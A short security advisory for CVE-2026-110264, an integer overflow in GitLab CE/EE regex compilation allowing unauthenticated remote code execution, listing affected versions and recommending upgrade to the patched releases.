CVE-2026-110264
Overview
This vulnerability is an integer overflow occurring during the compilation of specially crafted regular expressions within GitLab's regex processing component. The flaw affects the regex engine used in GitLab CE/EE versions prior to 18.11.13, 19.0.10, 19.1.9, 19.2.9, 19.3.6, 19.4.3, and 19.5.1. The integer overflow arises from improper handling of input size calculations, leading to memory corruption in the regex compilation routine.
Vulnerability Description
An issue has been discovered in GitLab CE/EE affecting all versions from 7.0 before 18.11.13, 19.0 before 19.0.10, 19.1 before 19.1.9, 19.2 before 19.2.9, 19.3 before 19.3.6, 19.4 before 19.4.3, and 19.5 before 19.5.1 that, under certain conditions, could have allowed an unauthenticated user to execute arbitrary code on the GitLab server due to integer overflow when compiling a specially crafted regular expression.
Impact
An attacker can execute arbitrary code on the GitLab server without authentication or user interaction, resulting in full system compromise. This allows unauthorized access to sensitive data, modification of repositories, and potential lateral movement within the network. The vulnerability enables complete takeover of the GitLab instance, severely impacting confidentiality, integrity, and availability of the affected systems and associated data.
Solution
Upgrade GitLab CE/EE to versions 18.11.13, 19.0.10, 19.1.9, 19.2.9, 19.3.6, 19.4.3, or 19.5.1 or later as specified in the official GitLab patch release notes. Refer to GitLab's advisory at https://docs.gitlab.com/releases/patches/patch-release-gitlab-19-5-1-released/ for detailed patch instructions. No alternative mitigations or workarounds are provided; timely application of the vendor-supplied patches is required to remediate this issue.
